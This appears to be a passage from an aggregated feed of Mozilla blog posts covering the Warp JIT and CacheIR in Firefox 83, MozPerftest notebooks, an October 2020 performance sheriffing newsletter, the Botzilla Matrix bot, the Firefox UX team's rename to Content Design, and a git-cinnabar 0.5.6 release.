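    }
  }
}

Feeding the o.x CacheIR listing from earlier through such a mapping yields a guard-guard-load sequence of MIR nodes, which the optimizing backend then processes as usual.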

Putting this all together we get the following picture:

We’re very excited about this design: when we make changes to the CacheIR instructions, it automatically affects all of our JIT tiers (see the blue arrows in the picture above). Warp is simply weaving together the function’s bytecode and CacheIR instructions into a single MIR graph.

Our old MIR builder (IonBuilder) had a lot of complicated code that we don’t need in WarpBuilder because all the JS semantics are captured by the CacheIR data we also need for ICs.

Trial Inlining: type specializing inlined functions

Optimizing JavaScript JITs are able to inline JavaScript functions into the caller. With Warp we are taking this a step further: Warp is also able to specialize inlined functions based on the call site.

Consider our example function again:

function f(o) {
    return o.x - 1;
}

This function may be called from multiple places, each passing a different shape of object or different types for o.x. In this case, the inline caches will have polymorphic CacheIR IC stubs, even if each of the callers only passes a single type. If we inline the function in Warp, we won’t be able to optimize it as well as we want.

To solve this problem, we introduced a novel optimization called Trial Inlining. Every function has an ICScript, which stores the CacheIR and IC data for that function. Before we Warp-compile a function, we scan the Baseline ICs in that function to search for calls to inlinable functions. For each inlinable call site, we create a new ICScript for the callee function. Whenever we call the inlining candidate, instead of using the default ICScript for the callee, we pass in the new specialized ICScript. This means that the Baseline Interpreter, Baseline JIT, and Warp will now collect and use information specialized for that call site.

Trial inlining is very powerful because it works recursively. For example, consider the following JS code:

function callWithArg(fun, x) {
    return fun(x);
}
function test(a) {
    var b = callWithArg(x => x + 1, a);
    var c = callWithArg(x => x - 1, a);
    return b + c;
}

When we perform trial inlining for the test function, we will generate a specialized ICScript for each of the callWithArg calls. Later on, we attempt recursive trial inlining in those caller-specialized callWithArg functions, and we can then specialize the fun call based on the caller. This was not possible in IonBuilder.

When it’s time to Warp-compile the test function, we have the caller-specialized CacheIR data and can generate optimal code.

This means we build up the inlining graph before functions are Warp-compiled, by (recursively) specializing Baseline IC data at call sites. Warp then just inlines based on that without needing its own inlining heuristics.

Optimizing built-in functions

IonBuilder was able to inline certain built-in functions directly. This is especially useful for things like Math.abs and Array.prototype.push, because we can implement them with a few machine instructions and that’s a lot faster than calling the function.

Because Warp is driven by CacheIR, we decided to generate optimized CacheIR for calls to these functions.

This means these built-ins are now also properly optimized with IC stubs in our Baseline Interpreter and JIT. The new design leads us to generate the right CacheIR instructions, which then benefits not just Warp but all of our JIT tiers.

For example, let’s look at a Math.pow call with two int32 arguments. We generate the following CacheIR:

LoadArgumentFixedSlot      resultId 1, slotIndex 3
GuardToObject              inputId 1
GuardSpecificFunction      funId 1, expectedOffset 0, nargsAndFlagsOffset 8
LoadArgumentFixedSlot      resultId 2, slotIndex 1
LoadArgumentFixedSlot      resultId 3, slotIndex 0
GuardToInt32               inputId 2
GuardToInt32               inputId 3
Int32PowResult             lhsId 2, rhsId 3
ReturnFromIC

First, we guard that the callee is the built-in pow function. Then we load the two arguments and guard they are int32 values. Then we perform the pow operation specialized for two int32 arguments and return the result of that from the IC stub.

Furthermore, the Int32PowResult CacheIR instruction is also used to optimize the JS exponentiation operator, x ** y. For that operator we might generate:

GuardToInt32               inputId 0
GuardToInt32               inputId 1
Int32PowResult             lhsId 0, rhsId 1
ReturnFromIC

When we added Warp transpiler support for Int32PowResult, Warp was able to optimize both the exponentiation operator and Math.pow without additional changes. This is a nice example of CacheIR providing building blocks that can be used for optimizing different operations.

Results

Performance

Warp is faster than Ion on many workloads. The picture below shows a couple of examples: we had a 20% improvement on Google Docs load time, and we are about 10-12% faster on the Speedometer benchmark:
20% faster on GDocs, 10-12% faster on Speedometer

We’ve seen similar page load and responsiveness improvements on other JS-intensive websites such as Reddit and Netflix. Feedback from Nightly users has been positive as well.

The improvements are largely because basing Warp on CacheIR lets us remove the code throughout the engine that was required to track the global type inference data used by IonBuilder, resulting in speedups across the engine.

The old system required all functions to track type information that was only useful in very hot functions. With Warp, the profiling information (CacheIR) used to optimize Warp is also used to speed up code running in the Baseline Interpreter and Baseline JIT.

Warp is also able to do more work off-thread and requires fewer recompilations (the previous design often overspecialized, resulting in many bailouts).

Synthetic JS benchmarks

Warp is currently slower than Ion on certain synthetic JS benchmarks such as Octane and Kraken. This isn’t too surprising because Warp has to compete with almost a decade of optimization work and tuning for those benchmarks specifically.

We believe these benchmarks are not representative of modern JS code (see also the V8 team’s blog post on this) and the regressions are outweighed by the large speedups and other improvements elsewhere.

That said, we will continue to optimize Warp in the coming months and we expect to see improvements on all of these workloads going forward.

Memory usage

Removing the global type inference data also means we use less memory. For example, the picture below shows that JS code in Firefox uses 8% less memory when loading a number of websites (tp6):
8% less memory on the tp6 suite

We expect this number to improve in the coming months as we remove the old code and are able to simplify more data structures.

Faster GCs

The type inference data also added a lot of overhead to garbage collection. We noticed some big improvements in our telemetry data for GC sweeping (one of the phases of our GC) when we enabled Warp by default in Firefox Nightly on September 23:
Drop in GC-sweeping times when warp landed, for example mean around 30 to around 20 ms

Maintainability and Developer Velocity

Because WarpBuilder is a lot more mechanical than IonBuilder, we’ve found the code to be much simpler, more compact, more maintainable and less error-prone. By using CacheIR everywhere, we can add new optimizations with much less code. This makes it easier for the team to improve performance and implement new features.

What’s next?

With Warp we have replaced the frontend (the MIR building phase) of the IonMonkey JIT. The next step is removing the old code and architecture. This will likely happen in Firefox 85. We expect additional performance and memory usage improvements from that.

We will also continue to incrementally simplify and optimize the backend of the IonMonkey JIT. We believe there’s still a lot of room for improvement for JS-intensive workloads.

Finally, because all of our JITs are now based on CacheIR data, we are working on a tool to let us (and web developers) explore the CacheIR data for a JS function. We hope this will help developers understand JS performance better.

Acknowledgements

Most of the work on Warp was done by Caroline Cullen, Iain Ireland, Jan de Mooij, and our amazing contributors André Bargull and Tom Schuster. The rest of the SpiderMonkey team provided us with a lot of feedback and ideas. Christian Holler and Gary Kwong reported various fuzz bugs.

Thanks to Ted Campbell, Caroline Cullen, Steven DeTar, Matthew Gaudet, Melissa Thermidor, and especially Iain Ireland for their great feedback and suggestions for this post.

The post Warp: Improved JS performance in Firefox 83 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Performance BlogUsing the Mach Perftest Notebook

In my previous blog post, I discussed an ETL (Extract-Transform-Load) implementation for doing local data analysis within Mozilla in a standardized way. That work provided us with a straightforward way of consuming data from various sources and standardizing it to conform to the expected structure for pre-built analysis scripts.

Today, we are using this ETL (called PerftestETL) not only locally, but also in our CI system! There, we have a tool called Perfherder which ingests data created by our tests in CI so that we can build up visualizations and dashboards like Are We Fast Yet (AWFY). The big benefit that this new ETL system provides here is that it greatly simplifies the path to getting from raw data to a Perfherder-formatted datum. This lets developers ignore the data pre-processing stage which isn’t important to them. All of this is currently available in our new performance testing framework MozPerftest.

One thing that I omitted from the last blog post is how we use this tool locally for analyzing our data. We had two students from Bishop’s University (:axew and :yue) work on this tool for course credit during the 2020 Winter semester. Over the summer, they continued hacking with us on this project and finalized the work needed to do local analyses using this tool through MozPerftest.

Below you can see a recording of how this all works together when you run tests locally for comparisons.

There is no audio in the video so here’s a short summary of what’s happening:

  1. We start off with a folder containing some historical data from past test iterations that we want to compare the current data to.
  2. We start the MozPerftest test using the `--notebook-compare-to` option to specify what we want to compare the new data with.
  3. The test runs for 10 iterations (the video is cut to show only one).
  4. Once the test ends, the PerftestETL runs and standardizes the data and then we start a server to serve the data to Iodide (our notebook of choice).
  5. A new browser window/tab opens to Iodide with some custom code already inserted into the editor (through a POST request) for a comparison view that we built.
  6. Iodide is run, and a table is produced in the report.
  7. The report then shows the difference between each historical iteration and the newest run.

With these pre-built analyses, we can help developers who are tracking metrics for a product over time, or simply checking how their changes affected performance without having to build their own scripts. This ensures that we have an organization-wide standardized approach for analyzing and viewing data locally. Otherwise, developers each start making their own report which (1) wastes their time, and more importantly, (2) requires consumers of these reports to familiarize themselves with the format.

That said, the real beauty in the MozPerftest integration is that we’ve decoupled the ETL from the notebook-specific code. This lets us expand the notebooks that we can open data in so we could add the capability for using R-Studio, Google Data Studio, or Jupyter Notebook in the future.

If you have any questions, feel free to reach out to us on Riot in #perftest.

 

Mozilla Performance BlogPerformance Sheriff Newsletter (October 2020)

In October there were 202 alerts generated, resulting in 25 regression bugs being filed on average 4.4 days after the regressing change landed.

Welcome to the second edition of the new format for the performance sheriffing newsletter! In last month’s newsletter I shared details of our sheriffing efficiency metrics. If you’re interested in the latest results for these you can find them summarised below, or (if you have access) you can view them in detail on our full dashboard. As sheriffing efficiency is so important to the prevention of shipping performance regressions to users, I will include these metrics in each month’s newsletter.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.7 days
  • 75% of alerts were triaged within 3 days
  • Valid regression alerts were associated with a bug in an average of 2 days
  • 95% of valid regression alerts were associated with a bug within 5 days

Regressions by release

For this edition I’m going to focus on a relatively new metric that we’ve been tracking, which is regressions by release. This metric shows valid regressions by the version of Firefox that they were first identified in, grouped by status. It’s important to note that we are running these performance tests against our Nightly builds, which is where we land new and experimental changes, and the results cannot be compared with our release builds.

Regression Bugs by Release Version

In the above chart I have excluded bugs resolved as duplicates, as well as results prior to release 72 and later than 83 as these datasets are incomplete. You’ll notice that the more recent releases have unresolved bugs, which is to be expected if the investigations are ongoing. What’s concerning is that there are many regression bugs for earlier releases that remain unresolved. The following chart highlights this by carrying unresolved regressions into the following release versions.

Regression Bugs by Release Version (carrying open bugs)

When performance sheriffs open regression bugs, they do their best to identify the commit that caused the regression and open a needinfo for the author. The affected Firefox version is indicated (this is how we’re able to gather these metrics), and appropriate keywords are added to the bug so that it shows up in the performance triage and release management workflows. Whilst the sheriffs do attempt to follow up on regression bugs, it’s clear that there are situations where the bug makes slow progress. We’re already thinking about how we can improve our procedures and policies around performance regressions, but in the meantime please consider taking a look over the open bugs listed below to see if any can be nudged back into life.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for October can be found here (for those with access).

Benjamin BouvierBotzilla, a multi-purpose Matrix bot tuned for Mozilla

Over the last year, Mozilla has decided to shut down the IRC network and replace it with a more modern platform. To my greatest delight, the Matrix ecosystem has been selected among all the possible replacements. For those who might not know Matrix, it's a modern, decentralized, well-documented protocol using plain HTTP endpoints with JSON-formatted payloads, and it implements both features that are common in recent messaging systems (e.g. file attachments, message edits and deletions) and features needed to handle large groups (e.g. moderation tools, private rooms, invite-only rooms).

In this post I reflect on my personal history of writing chat bots, and then present a panel of features that the bot has, some user-facing ones, some others that embody what I esteem to be a sane, well-behaved Matrix bot.

but first, some history

Back in 2014 when I was an intern at Mozilla, I made a silly IRC JavaScript bot that would quote the @horsejs twitter account, when asked to do so. Then a few other useless features were added: "karma" tracking 1, being a karma guardian angel (lowering the karma of people lowering the karma of some predefined people), keeping track of contextless quotes from misc people...

Over time, it slowly transformed into an IRC bot framework, with modules you could attach and configure at startup, setting which rooms the bot would join, what should be the cooldowns for message sending (more on this later), and so much more! Hence it was renamed meta-bot.

an aside on the morality of bots

I find making bots a fun activity, since once you've passed the step of connecting and sending messages, the rest is mostly easy (cough cough regular expressions cough cough) and creative work. And it's unfortunately easy to be reckless too.

At the time, I never considered the potentially bad effects of quoting text from a random source, viz. fetching tweets from the @horsejs account. If the source returned a message that was inconsiderate, rude, or even worse, aggressive, then the bot would replicate this behavior. It is a real issue because although the bot doesn't think by itself and doesn't mean any harm, its programmers can do better, and they should try to avoid these issues at all costs. On one hand, a chat bot replicates the culture of the engineers who made it, but it also contributes to propagating this culture in the chat rooms it participates in, normalizing it to the chat participants.

My bot happened to be well-behaved most of the time... until one time where it was not. After noticing the incident and expressing my deepest apologies, I deactivated the module and went through the whole list of modules, to make sure none could cause any harm, in any possible way. I should have known better in the first place! I am really not trying to signal my own virtue, since I failed in a way that should have been predictable. I hope by writing this that other people may reflect about the actions of their bots as well, in case they could be misbehaving like this.

the former fleet of mozilla bots

There were a few other useful IRC bots (of which I wasn't the author) hanging out in the Mozilla IRC rooms, notably Firebot and mrgiggles. The latter probably started as a joke too, to enumerate puns from a list in the JavaScript channel. Then it outgrew its responsibilities by helping with a handful of requests: who can review this or that file in Mozilla's source code? what's the status of the continuous integration trees? can this particular C++ function used in Gecko cause a garbage collection?

When we moved over to Matrix, the bots unfortunately became outdated, since the communication protocol (IRC) they were using was different. We could have ported them to the Matrix protocol, but the Not-Invented-Here syndrome was strong with this one: I've been making bots for a while, and I was personally interested in the Matrix protocol and trying out the JS facilities offered by the Matrix ecosystem.

Botzilla features

So I've decided to write Botzilla, a successor in spirit to meta-bot and mrgiggles, written in TypeScript. This is a very unofficial bot, tailored for Mozilla's needs but probably useful in other contexts. I've worked on it informally as a side-project, in my copious spare time. Crafting tools that prove useful to other people has been a sufficient reward to motivate me to work on it, so it's been quite fun!

Botzilla's logo, courtesy of Nical

Let's take a look at all the features that the bot offers, at this point.

uuid: Generate unique IDs

This was a feature of Firebot, and easy enough to replicate, so it became the first module and served as the test feature for the Matrix bot framework. When saying !uuid, the bot will automatically generate a unique id (using uuid v4), guaranteed GMO-free and usable in any context that would require it.

Demo of uuid
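For a flavor of what such a module can look like on top of matrix-bot-sdk (the library the author credits at the end of the post), here is a hedged, self-contained sketch; it is not Botzilla's actual code, and the homeserver URL and access token below are placeholders:

// Hedged sketch of a "!uuid" module; not Botzilla's actual code.
// "https://matrix.example.org" and "ACCESS_TOKEN" are placeholders.
import { MatrixClient, SimpleFsStorageProvider, AutojoinRoomsMixin } from "matrix-bot-sdk";
import { v4 as uuidv4 } from "uuid";

// Exported help string, in the spirit of the self-documentation described later.
export const help = "!uuid: reply with a freshly generated UUID v4.";

const storage = new SimpleFsStorageProvider("botzilla-sketch.json");
const client = new MatrixClient("https://matrix.example.org", "ACCESS_TOKEN", storage);
AutojoinRoomsMixin.setupOnClient(client); // join every room the bot is invited to

client.on("room.message", async (roomId: string, event: any) => {
  const body: string | undefined = event?.content?.body;
  if (!body || !body.trim().startsWith("!uuid")) {
    return;
  }
  await client.sendText(roomId, uuidv4()); // reply with a fresh UUID v4
});

client.start().then(() => console.log("uuid sketch module up"));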

treestatus: Inform about CI tree status

Mozilla developers tend to interact a lot with the continuous integration trees, because code is sometimes landed, sometimes backed out (sorry/thank you sheriffs!), sometimes merged across branches. This leads to the integration trees being closed. Before we had the feature to automatically land patch stacks when the trees reopened, it was useful to be able to get the open/close status of a tree. Asking !treestatus makes the bot answer with a list of the status of some common trees. It is also possible to request the status of a particular tree, e.g. for the "mozilla-central" tree, by asking !treestatus mozilla-central (or just central, as a handy shortcut).

Demo of treestatus

Expand bug status

If you have ever interacted with Mozilla's code, chances are that you've used Bugzilla and mentioned bug numbers in conversations. The bot catches any message containing bug XXX and will respond with a link to the bug, the nickname of the person assigned to it (if there is one), and its summary, if it's public. This is by far the most used and useful module, since it doesn't require a special incantation, but will react automatically to a lot of messages written with no particular intent (see below where it's explained how to not be spammy, though).

Demo of expand-bug
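As a rough illustration of the mechanics (not Botzilla's actual implementation), a module like this boils down to a regular expression plus a lookup against Bugzilla's public REST API; the exact fields Botzilla uses may differ:

// Hedged sketch of bug-number expansion; not Botzilla's actual code.
// Uses the public BMO REST endpoint GET /rest/bug/<id> for public bugs.
const BUG_RE = /\bbug\s+(\d+)\b/gi;

async function expandBugs(message: string): Promise<string[]> {
  const replies: string[] = [];
  for (const match of message.matchAll(BUG_RE)) {
    const id = match[1];
    const resp = await fetch(`https://bugzilla.mozilla.org/rest/bug/${id}`);
    if (!resp.ok) {
      continue; // private or unknown bug: stay quiet rather than spam
    }
    const { bugs } = (await resp.json()) as {
      bugs: { summary: string; assigned_to: string }[];
    };
    if (bugs.length > 0) {
      replies.push(
        `https://bugzilla.mozilla.org/show_bug.cgi?id=${id} - ` +
          `${bugs[0].summary} (assigned to ${bugs[0].assigned_to})`,
      );
    }
  }
  return replies;
}

A real module would also run the anti-spam checks described later in the post before sending anything.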

Who Can Review X?

This was a very nice feature that mrgiggles had: ask for potential reviewers for a particular file in the Gecko source tree and get a list of most recent reviewers. Botzilla replicates this, when seeing the trigger: who can review js/src/wasm/WasmJS.cpp?. The list of potential reviewers is extracted from Mercurial logs, looking for the N last reviewers of this particular file.

As a bonus, there's no need to pass the full path to the file, if the file's name is unique in the tree's source code. Botzilla will trigger a search in Searchfox, and will use the unique name in the result list, if there's such a unique result. The previous example thus can be shortened to who can review WasmJS.cpp? since the file's name is unique in the whole code base.

Demo of who can review

{Github,Gitlab} {issues,{P,M}Rs}

It is possible for a room administrator to "connect" a given Matrix room to a Github repository. Later on, any mention of issues or pull requests by their number, e.g. #1234, will make Botzilla react with the summary and a link to the issue/PR at stake.

This also works for Gitlab repositories, with slight differences: the administrator has to specify the root URL of the Gitlab instance (since Gitlab can be self-hosted). Issues are caught when a number follows a # sign, while merge requests are caught when the number follows a ! sign.

Demo of gitlab

!tweet/!toot: Post on Twitter/Mastodon

An administrator can configure a room to tie it up to a Twitter (respectively Mastodon) user account, using API tokens. Then, any person with an administrative role can post messages with !tweet something shocking for the bird site (respectively !toot something heartful for the mammoth site). This makes it possible to allow other people to post on these social networks without the need to give them the account's password.

Unfortunately, the Twitter module hasn't ever been tested: when I tried to create a developer account, Twitter accepted it after a few days but then never displayed the API tokens on the interface. Support also never answered when I asked for help. Thankfully Mastodon can be self-hosted and is thus easier to test. I'm happy to report that it works quite well!

confession and histoire

It is quite common in teams to set up regular standup meetings, where everyone in the team announces what they've been working on in the last few days or week. It also strikes me as important for personal recognition, including towards management, to be able to show off (just a bit!) what you've accomplished recently, and to remember this when times are harder (see also Julia Evans' blog post on the topic).

There's a Botzilla module for this. Every time someone starts a message with confession:, everything after the colon is saved to a database (...wait for it!). Then, all the confessions are displayed on the Histoire 2 website, with one message feed per user. Note that it is possible to send confessions privately to Botzilla (that doesn't affect the frontend, though, which is open and public to all!) or in a public channel. Public channels roughly correspond to teams, so channels also get their own pages on the frontend.

Demo of confession

Screenshot of Histoire

Now the fun/cursed part is how all of this works. This was implemented in mrgiggles, and I liked it a lot, since it required no kind of backend or frontend server. How so? By (ab)using Github files as the database and Github pages as the frontend. Sending a confession will trigger a request to a Github endpoint to find a database file segregated by time, then it will trigger another request to create/modify it with the content of the confession. The frontend then uses other requests to public Github APIs to read the confessions before dynamically rendering those. Astute readers will notice that under a lot of confession activity, the bot would be a bit slowed down by Github's API rate limits. In this case, there's some exponential backoff behavior before trying to re-send unsaved confessions to Github. Overall it works great, and API rate limits have never really been a problem.
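The exponential backoff part is essentially a generic retry wrapper. A minimal sketch of the idea (not the actual Botzilla/Histoire code; saveToGithub stands in for whatever call writes the confession via the GitHub contents API) could look like this:

// Hedged sketch of retry-with-exponential-backoff for unsaved confessions.
async function saveWithBackoff(
  saveToGithub: () => Promise<void>,
  maxAttempts = 5,
): Promise<void> {
  let delayMs = 1_000;
  for (let attempt = 1; attempt <= maxAttempts; attempt++) {
    try {
      await saveToGithub();
      return; // saved, nothing left to do
    } catch (err) {
      if (attempt === maxAttempts) {
        throw err; // give up: leave the confession queued for later
      }
      // Rate-limited or transient failure: wait, then double the delay.
      await new Promise((resolve) => setTimeout(resolve, delayMs));
      delayMs *= 2;
    }
  }
}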

Intrinsic features: they're good bots, bront

In addition to all the user-facing features, the bot has a few other interesting attributes that are more relevant to consider from a framework point of view. Hopefully some of these ideas can be useful for other bot authors!

Join All The Rooms!

Every time the bot is invited to a channel, be it public or private, it will join the channel, making it easy to use in general. This came for free with the JS framework I've been using, and it is a definite improvement over the IRC version of the bot.

Sometimes Matrix rooms are upgraded to a new version of the room. The bot will try to join the upgraded room if it can, keeping all its room settings intact during the transition.

Thou shalt not spam

To avoid spamming the channel, especially for modules that are reactions to other messages (think: bug numbers, issues/pull requests mentions), the bot has had to learn how to keep quiet. There are two rules triggering the quieting behavior:

  • if the bot has already reacted less than N minutes ago (where N is a configurable amount) in the same room,
  • or if it has already reacted to some entity in a message, and there's been fewer than M messages in between the last reaction and the last message mentioning the same entity in the same room (M is also configurable)

If either of these two criteria is met, the bot will keep quiet and not react to another similar message. The combination of the two has proven quite solid over time in my experience, based on observing the bot's behavior and public reactions to it.
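A hedged sketch of that check, where N and M correspond to the two configurable thresholds described above (this is not Botzilla's actual implementation):

// Per-room state and the two quieting rules.
interface RoomState {
  lastReactionTime: number | null;              // ms timestamp of the last reaction
  messagesSinceReactionTo: Map<string, number>; // entity -> messages seen since we reacted to it
}

function shouldStayQuiet(
  state: RoomState,
  entity: string,             // e.g. "bug 1234" or "#567"
  now: number,
  cooldownMinutes: number,    // N
  minMessagesBetween: number, // M
): boolean {
  // Rule 1: the bot already reacted less than N minutes ago in this room.
  if (state.lastReactionTime !== null &&
      now - state.lastReactionTime < cooldownMinutes * 60_000) {
    return true;
  }
  // Rule 2: it already reacted to this entity, and fewer than M messages have passed since.
  const seen = state.messagesSinceReactionTo.get(entity);
  if (seen !== undefined && seen < minMessagesBetween) {
    return true;
  }
  return false;
}

Every reactive module would consult such a check before replying, and update the state whenever it does react.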

A similar mechanism is used for the confession module: on a first confession, the bot will answer with a message saying it has seen the confession, including a link to where it is going to be posted, and will add an "eyes" emoji reaction to the message. Posting this long-form message could be quite spammy if there are a lot of confessions around the same time, so under the same criteria it will just react with an "eyes" emoji to other confessions. Later on, it'll resend the full message, once neither criterion is blocking it from doing so.

Decentralized administration self-service

The bot can be administrated by talking to it with the !admin command. This can happen either in a private conversation with it or in public channels, though doing so in private is recommended. To confirm that an admin action has succeeded, it'll react with a thumbs-up emoji on the message performing the action.

To have a single administrator for the bot would be quite the burden, and it is not resilient to people switching roles, leaving the company, etc. Normally you'd solve this by implementing your own access control lists. Fortunately, Matrix already has a concept of power levels that assigns roles to users, among which there are the administrator and moderator roles.

The bot will rely on this to decide to which requests it will answer. Somebody marked as an administrator or a moderator of a room can administrate Botzilla in this particular room, using the !admin commands. There's still a super-admin role, that must be defined in the configuration, in case things go awry. While administrators only have power over the current room, a super-admin can use its super-powers to change anything in any room. This decentralization of the administrative roles makes it easy to have different settings for different rooms, and to rely a bit less on single individuals.

Key-value store

In general, the bot contains a key-value store implemented on top of an SQLite database, making it easy to migrate and to add context that's preserved across restarts of the bot. This is used to store private information like user repository information and settings for most rooms. Conceptually, each pair of room and module has its own key-value store, so that there's no risk of confusion between different rooms and modules. There's also a per-module key-value store that applies to all rooms, to represent global settings. If there are non-global (per-room) settings for a room, these are preferred over the global settings.
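A minimal sketch of that lookup order, assuming an SQLite-backed table and the better-sqlite3 package (the actual Botzilla schema and storage layer may differ; "*" stands in for the global scope here):

// Hedged sketch of the per-(room, module) key-value store with a global fallback.
import Database from "better-sqlite3";

const db = new Database("botzilla-sketch.db");
db.exec(`CREATE TABLE IF NOT EXISTS kv (
  room   TEXT NOT NULL,   -- room id, or '*' for the global per-module setting
  module TEXT NOT NULL,
  key    TEXT NOT NULL,
  value  TEXT NOT NULL,
  PRIMARY KEY (room, module, key)
)`);

const lookup = db.prepare(
  "SELECT value FROM kv WHERE room = ? AND module = ? AND key = ?"
);

function getSetting(roomId: string, module: string, key: string): string | undefined {
  // Prefer the room-specific value, then fall back to the global one.
  const row = (lookup.get(roomId, module, key) ?? lookup.get("*", module, key)) as
    { value: string } | undefined;
  return row?.value;
}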

Self-documentation

Each chat module is implemented as an ECMAScript module and must export a help string alongside the main reaction function. This is then captured and aggregated as part of a !help command, which can be used to request help about how to use the bot. The main help message will display the list of all the enabled modules, and help about a specific module may be queried with e.g. !help uuid.
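A hedged sketch of what that aggregation can look like (the module shape below is an assumption for illustration, not Botzilla's actual interface):

// Sketch of aggregating per-module help strings into the !help command.
interface ChatModule {
  name: string;
  help: string;
  handler: (roomId: string, body: string) => Promise<void>;
}

function helpFor(modules: ChatModule[], query?: string): string {
  if (query) {
    const mod = modules.find((m) => m.name === query);
    return mod ? mod.help : `No module named "${query}".`;
  }
  // No argument: list the enabled modules.
  return "Enabled modules: " + modules.map((m) => m.name).join(", ");
}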

Future work and conclusion

If I were to start again, I'd do a few things differently:

  • now that the Rust ecosystem around the Matrix platform has matured a bit, I'd probably write this bot in Rust. Starting from JavaScript and moving to TypeScript has helped me catch a few static issues. I'd expect moving to Rust would help handle Matrix events faster, provide end-to-end encryption support for free, and be quite pleasant to use in general thanks to the awesome Rust tooling.
  • use a real single-page app framework for the Histoire website. Maybe? I mean I'm a big fan of VanillaJS, but using it means re-creating your own Web-framework-like thing to make it nice and productive to use.
  • despite being a fun hack, using Github as a backend has algorithmic limitations that can make the web app sluggish. In particular, a combined feed for N users over M eras (think: periods) will trigger NxM Github API requests. Using a plain database with a plain API would probably be simpler at this point. This is mitigated with an in-memory cache, so the full set of requests only happens the first time, but crafting my own requests would be more expressive and efficient, and would allow for more features too (like displaying the list of rooms on the start view).
  • provide a (better) commands parser. Regular expressions in this context are a bit feeble and limited. Also right now each module could in theory reuse the same command triggers as another one, etc.
  • implement the chat modules in WebAssembly :-) In fact, I think there's a whole business model which would consist in having the bot framework including a wasm VM, and interacting with different communication platforms (not restricted to Matrix). Developers in such a bot platform could choose which source language to use for developing their own modules. It ought to be possible to define a clear, restricted, WASI-like capabilities-based interface that gets passed to each chat module. In such a sandboxed environment, the responsibility for hosting the bot's code is decoupled from the responsibility of writing modules. So a company could make the platform available, and paying users would develop the modules and host them. Imagine git pushing your chat modules and they get compiled to wasm and deployed on the fly. But I digress! (Please do not forget to credit me with a large $$$ envelope/a nice piece of swag if implementing this at least multi-billion dollars idea.)

I'd like to finish by thanking the authors of the previous Mozilla bots, namely sfink and glob: your puppets have been incredible sources of inspiration. Also huge thanks to the people hanging in the matrix-bot-sdk chat room, who've answered questions and provided help on a few occasions.

I hope you liked this presentation of Botzilla and its features! Of course, all the code is free and open-source, including the bot as well as the histoire frontend. At this point it is addressing most of the needs I had, so I don't have immediate plans to extend it further. I'd happily take contributions, though, so feel free to chime in if you'd like to implement anything! It's also a breeze to run on any machine, thanks to Docker-based deployment. Have fun with it!


  1. Karma is an IRC idiosyncrasy, in which users rate up and down other users using their nickname suffixed with ++ or --. Karma tracking consists in keeping scores and displaying those. 

  2. Histoire is the French for "history" and "story". Inherited from Steve Fink's very own mrgiggles :-) 

Firefox UXWe’re Changing Our Name to Content Design

The Firefox UX content team has a new name that better reflects how we work.

Co-authored with Betsy Mikel

Stock photo image of a stack of blank business cards

Photo by Brando Makes Branding on Unsplash


 

Hello. We’re the Firefox Content Design team. We’ve actually met before, but our name then was the Firefox Content Strategy team.

Why did we change our name to Content Design, you ask? Well, for a few (good) reasons.

It better captures what we do

We are designers, and our material is content. Content can be words, but it can be other things, too, like layout, hierarchy, iconography, and illustration. Words are one of the foundational elements in our design toolkit — similar to color or typography for visual designers — but it’s not always written words, and words aren’t created in a vacuum. Our practice is informed by research and an understanding of the holistic user journey. The type of content, and how content appears, is something we also create in close partnership with UX designers and researchers.

“Then, instead of saying ‘How shall I write this?’, you say, ‘What content will best meet this need?’ The answer might be words, but it might also be other things: pictures, diagrams, charts, links, calendars, a series of questions and answers, videos, addresses, maps […] and many more besides. When your job is to decide which of those, or which combination of several of them, meets the user’s need — that’s content design.”
— Sarah Richards defined the content design practice in her seminal work, Content Design

It helps others understand how to work with us

While content strategy accurately captures the full breadth of what we do, this descriptor is better understood by those doing content strategy work or those very familiar with it. And, as we know from writing product copy, accuracy is not synonymous with clarity.

Strategy can also sound like something we create on our own and then lob over a fence. In contrast, design is understood as an immersive and collaborative practice, grounded in solving user problems and business goals together.

Content design is thus a clearer descriptor for a broader audience. When we collaborate cross-functionally (with product managers, engineers, marketing), it’s important they understand what to expect from our contributions, and how and when to engage us in the process. We often get asked: “When is the right time to bring in content?” And the answer is: “The same time you’d bring in a designer.”

We’re aligning with the field

Content strategy is a job title often used by the much larger field of marketing content strategy or publishing. There are website content strategists, SEO content strategists, and social media content strategists, all of whom do different types of content-related work. Content design is a job title specific to product and user experience.

And, making this change is in keeping with where the field is going. Organizations like Slack, Netflix, Intuit, and IBM also use content design, and practice leaders Shopify and Facebook recently made the change, articulating reasons that we share and echo here.

It distinguishes the totality of our work from copywriting

Writing interface copy is about 10% of what we do. While we do write words that appear in the product, it’s often at the end of a thoughtful design process that we participate in or lead.

We’re still doing all the same things we did as content strategists, and we are still strategic in how we work (and shouldn’t everyone be strategic in how they work, anyway?) but we are choosing a title that better captures the unseen but equally important work we do to arrive at the words.

It’s the best option for us, but there’s no ‘right’ option

Job titles are tricky, especially for an emerging field like content design. The fact that titles are up for debate and actively evolving shows just how new our profession is. While there have been people creating product content experiences for a while, the field is really starting to now professionalize and expand. For example, we just got our first dedicated content design and UX writing conference this year with Button.

Content strategy can be a good umbrella term for the activities of content design and UX writing. Larger teams might choose to differentiate more, staffing specialized strategists, content designers, and UX writers. For now, content design is the best option for us, where we are, and the context and organization in which we work.

“There’s no ‘correct’ job title or description for this work. There’s not a single way you should contribute to your teams or help others understand what you do.”
 — Metts & Welfle, Writing is Designing

Words matter

We’re documenting our name change publicly because, as our fellow content designers know, words matter. They reflect but also shape reality.

We feel a bit self-conscious about this declaration, and maybe that’s because we are the newest guests at the UX party — so new that we are still writing, and rewriting, our name tag. So, hi, it’s nice to see you (again). We’re happy to be here.

 

Thank you to Michelle Heubusch, Gemma Petrie, and Katie Caldwell for reviewing this post. 

Mike HommeyAnnouncing git-cinnabar 0.5.6

Please partake in the git-cinnabar survey.

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows you to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.5?

  • Updated git to 2.29.2 for the helper.
  • git cinnabar git2hg and git cinnabar hg2git now have a --batch flag.
  • Fixed a few issues with experimental support for python 3.
